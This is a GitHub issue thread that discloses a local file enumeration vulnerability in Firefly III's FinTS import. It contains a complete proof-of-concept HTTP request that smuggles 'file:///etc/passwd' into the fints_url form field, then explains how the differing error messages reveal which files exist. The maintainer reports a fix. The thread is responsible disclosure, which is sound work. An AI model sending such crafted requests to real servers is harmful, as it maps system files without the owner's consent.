### ISSUE TITLE
Local file enumeration vulnerability. 

### ISSUE THREAD

**Issue by 0x2500** [firefly-iii/firefly-iii#2367]
**Bug description**
Current version of Firefly III Version 4.7.17.3 is vulnerable to local files enumeration.

**Steps to reproduce**
1. Visit 
```
import/create/fints
```
2. Send that request:
```
POST /import/job/configuration/[unique string here, visit link above to get it] HTTP/1.1
Host: Your-Host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Cookie: ...

_token=[your token]&fints_url=file:///etc/passwd&fints_port=443&fints_bank_code=1&fints_username=1&fints_password=1&apply_rules=1
```
You will be redirected to http://your-host/import/job/configuration/[token] where you can see
```
 "An error occurred while trying to connecting to your bank. Please make sure that all the data you entered is correct. Original error message: Bad response with status code 0".
```
 Send request above again with "fints_url=file:///etc/something-that-do-not-exist", you will see
```
 "An error occurred while trying to connecting to your bank. Please make sure that all the data you entered is correct. Original error message: Failed connection to file:///etc/something-that-do-not-exist: Couldn&#039;t open file /etc/something-that-do-not-exist".
```
3. Error codes are different, and malicious attacker can use it to gain information about local file system, enumerate files and paths, bruteforce file structure. That issue appeared because you use libcurl, without proper protocol sanitizing.

**Comment by JC5** [comment]
Should be fixed, if you could verify I would be grateful.

**Comment by 0x2500** [comment]
Fixed.
